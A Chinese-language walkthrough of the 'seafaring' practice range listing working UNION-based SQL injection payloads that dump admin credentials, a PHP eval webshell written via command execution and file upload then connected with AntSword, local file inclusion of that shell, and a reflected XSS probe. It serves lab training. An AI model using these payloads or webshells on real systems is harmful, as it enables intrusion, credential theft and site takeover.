seafaring靶场漏洞测试攻略

打开网页

一.sql注入漏洞

1.输入框测试回显点

-1 union select 1,2,3#

2.查看数据库名

-1 union select 1,2,database()#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin表中列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看admin的账号和密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

账号为admin,密码为mysql

二:命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问69.php

echo '<?php @eval($_POST['cmd']);?>' > 69.php

4.蚁剑连接

三:文件上传漏洞

1.使用 账号为admin,密码为mysql 登录网站后台,下方有一个上传文件的地方

2.上传php文件成功,尝试写入一句话木马到wff.php中上传

3.访问上传成功给的路径

4.蚁剑连接

四:文件包含漏洞

1.页面关于存在文件包含

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.包含之前的69.php一句话木马,访问

4.蚁剑连接

五:反射型xss漏洞

1.登陆界面输入错误会回显在页面上

2.输入<script>alert(1)</script>,页面弹1

相关推荐
我可是ikun啊11 分钟前
Redis经典面试题
数据库·redis·缓存
Pseudo…44 分钟前
MySQL数据库操作
数据库·mysql
格子衫-20031 小时前
MySQL中MVCC指什么?
数据库·mysql
小布不吃竹1 小时前
数据库连接池
java·数据库
码熔burning1 小时前
MySQL的Order by与Group by优化详解!
数据库·mysql
王天华帅哥2 小时前
重构 cluster-db 选择器,新增限制字段 showDb 不影响原功能前提实现查询功能增量拓展
数据库·重构
双叶8362 小时前
(51单片机)LCD显示红外遥控相关数字(Delay延时函数)(LCD1602教程)(Int0和Timer0外部中断教程)(IR红外遥控模块教程)
c语言·数据库·c++·单片机·嵌入式硬件·mongodb·51单片机
GUIQU.2 小时前
【MySQL】数据库、数据表的基本操作
数据库·mysql
CopyLower3 小时前
MySQL 5.7 之后的特性解析:从 8.0 到 8.4 的技术进化
数据库·mysql
chat2tomorrow3 小时前
数据中台建设系列(五):SQL2API驱动的数据共享与服务化实践
大数据·数据库·数据仓库·sql·数据治理·数据中台·sql2api